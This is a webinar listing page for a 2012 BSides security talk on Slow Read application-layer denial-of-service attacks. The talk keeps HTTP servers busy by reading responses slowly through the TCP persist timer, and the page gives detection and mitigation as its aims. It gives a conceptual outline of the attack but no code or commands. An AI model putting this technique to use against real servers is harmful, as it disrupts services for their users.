Hi [[ session.user.profile.firstName ]]

Yet Another Type of Application Layer DoS Attack that Should Be Taken Care Of

While developers and administrators are paying attention to handling slow HTTP requests without issues, another aspect is being overlooked – making sure clients of HTTP servers are accepting server data fast enough.

This workshop will present a tool that, along with other attacks, performs a Slow Read Application Layer DoS attack, that keeps the HTTP server busy by requesting relatively large resources and accepting them abnormally slowly by exploiting TCP Persist Timer (MS09-048, CVE-2008-4609, CVE-2009-1925, CVE-2009-1926). Although the possibility to prolong the TCP connection forever was first mentioned three years ago, most web servers are still not able to handle this issue. My approach, unlike others, doesn’t require any TCP packet crafting, and the tool I developed controls TCP bandwidth by manipulating socket options through the socket API.

The attack is easy to execute because a single machine is able to establish thousands of connections to a server and generate thousands of legitimate HTTP requests in a very short period of time using minimal bandwidth. Due to implementation differences among various HTTP servers, different attack vectors exist which will be discussed in this talk, along with demonstration and the best approaches to detect vulnerability to these attacks. Detection and mitigation techniques will also be discussed.
Recorded Feb 28 2012 60 mins
Your place is confirmed,
we'll send you email reminders
Presented by
Sergey Shekyan
Presentation preview: Yet Another Type of Application Layer DoS Attack that Should Be Taken Care Of

Network with like-minded attendees

  • [[ session.user.profile.displayName ]]
    Add a photo
    • [[ session.user.profile.displayName ]]
    • [[ session.user.profile.jobTitle ]]
    • [[ session.user.profile.companyName ]]
    • [[ userProfileTemplateHelper.getLocation(session.user.profile) ]]
  • [[ card.displayName ]]
    • [[ card.displayName ]]
    • [[ card.jobTitle ]]
    • [[ card.companyName ]]
    • [[ userProfileTemplateHelper.getLocation(card) ]]
  • Channel
  • Channel profile
Presentations from the BSides Events and Beyond
Presentations from the BSides Events and Beyond

Embed in website or blog

Successfully added emails: 0
Remove all
  • Title: Yet Another Type of Application Layer DoS Attack that Should Be Taken Care Of
  • Live at: Feb 28 2012 11:00 pm
  • Presented by: Sergey Shekyan
  • From:
Your email has been sent.
or close